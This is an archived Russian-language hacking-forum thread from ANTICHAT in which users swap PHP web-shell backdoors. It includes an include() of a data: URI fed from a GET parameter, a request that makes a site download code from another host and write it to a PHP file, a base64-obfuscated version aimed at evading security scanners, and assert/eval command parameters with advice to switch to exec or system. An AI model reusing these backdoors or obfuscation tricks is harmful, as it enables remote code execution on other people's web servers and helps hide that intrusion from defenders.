ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.07.2015, 13:01
|
|
Познающий
Регистрация: 16.07.2015
Сообщений: 30
Провел на форуме:
8796
Репутация:
0
|
|
Сообщение от b3
↑
еще один хакер... давайте глупости писать не будем может?
а нафига велосипед изобретать
|
|
|
25.07.2015, 13:05
|
|
Познающий
Регистрация: 16.07.2015
Сообщений: 30
Провел на форуме:
8796
Репутация:
0
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]include([/COLOR][COLOR="#DD0000"]"data:text/plain;base64,base64_encode([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'c'])"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
|
|
|
|
25.07.2015, 13:32
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
Сообщение от koro
↑
а нафига велосипед изобретать
Может велосипед нужен для того чтоб обойти сканеры безопасности?
|
|
|
|
25.07.2015, 18:09
|
|
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432
Репутация:
0
|
|
поклон всем за ответы... опытным путем выявил, что самым рабочим вариантов является этот
но он и самый палевый! вопрос, можно ли его абфусцировать с сохранением работоспособности, если да - меняется ли кодировка запроса?
сейчас запрос таков:
Код:
http://site.ru/index.php?cmd=$url = "http://site2.ru/text.txt";$content = file_get_contents($url);$h = fopen("text.php","w");$text = "$content";fwrite($h,$text);fclose($h);
|
|
|
|
25.07.2015, 18:15
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от skaska
↑
поклон всем за ответы... опытным путем выявил, что самым рабочим вариантов является этот
но он и самый палевый! вопрос, можно ли его абфусцировать с сохранением работоспособности, если да - меняется ли кодировка запроса?
сейчас запрос таков:
Код:
http://site.ru/index.php?cmd=$url = "http://site2.ru/text.txt";$content = file_get_contents($url);$h = fopen("text.php","w");$text = "$content";fwrite($h,$text);fclose($h);
Код:
http://site.ru/index.php?cmd=base64_decode('JHVybCA9ICJodHRwOi8vc2l0ZTIucnUvdGV4dC50eHQiOyRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7JGg9Zm9wZW4oInRleHQucGhwIiwidyIpOyR0ZXh0ID0gIiRjb250ZW50Ijtmd3JpdGUoJGgsJHRleHQpO2ZjbG9zZSgkaCk7');
Кодировать тут http://securityxploded.com/online-base64-encoder.php
Еще вот посмотри
http://habrahabr.ru/post/215139
http://habrahabr.ru/post/215817/
|
|
|
|
25.07.2015, 19:42
|
|
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432
Репутация:
0
|
|
спасибо за ссылки, ответ на свой вопрос там не нашел... в соседней ветки нашел что можно абфуцировать так
но зачем он это сделал я не понял, ведь функция eval как говориться наружу бархатом осталась.. смысл было это делать..
интересует конкретно вопрос: можно ли обфусцировать всю строку без потери работоспособности и меняется ли при этом кодировка в запросе?
|
|
|
|
25.07.2015, 20:01
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Б3, запости им свой зиродей
|
|
|
|
25.07.2015, 20:17
|
|
Новичок
Регистрация: 04.05.2006
Сообщений: 1
Провел на форуме:
19432
Репутация:
0
|
|
разобрался ребята, за назойливость прошу простить
для меня лучший варик это:
Код:
file.php?f=assert&c=phpinfo();
file.php?f=eval&c=echo 1;
проверил работает! дальше больше...
и еще, eval часто не срабатывает - заменяем на exec или system и радуемся. Выше хороший человек подсказал: спасибо ему второй раз! |
|
|
|
25.07.2015, 21:25
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
eval работает всегда а вот как раз таки system часто отключен, уверен на 100% передаешь в eval невалидный код вот и облом
|
|
|
|
26.07.2015, 00:30
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
Провел на форуме:
193811
Репутация:
724
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
